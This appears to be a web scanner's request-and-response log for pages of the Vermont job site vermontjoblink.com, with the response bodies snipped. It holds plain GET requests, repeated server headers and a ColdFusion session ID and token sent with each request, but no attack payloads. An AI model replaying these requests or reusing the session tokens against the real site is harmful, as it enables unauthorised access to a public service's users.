HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:20 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_veterans_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/mn_warn_dsp.cfm?def=false HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:12:07 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/services/schools/schsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/FAQ.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/contactus.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/employeroverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/joboverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 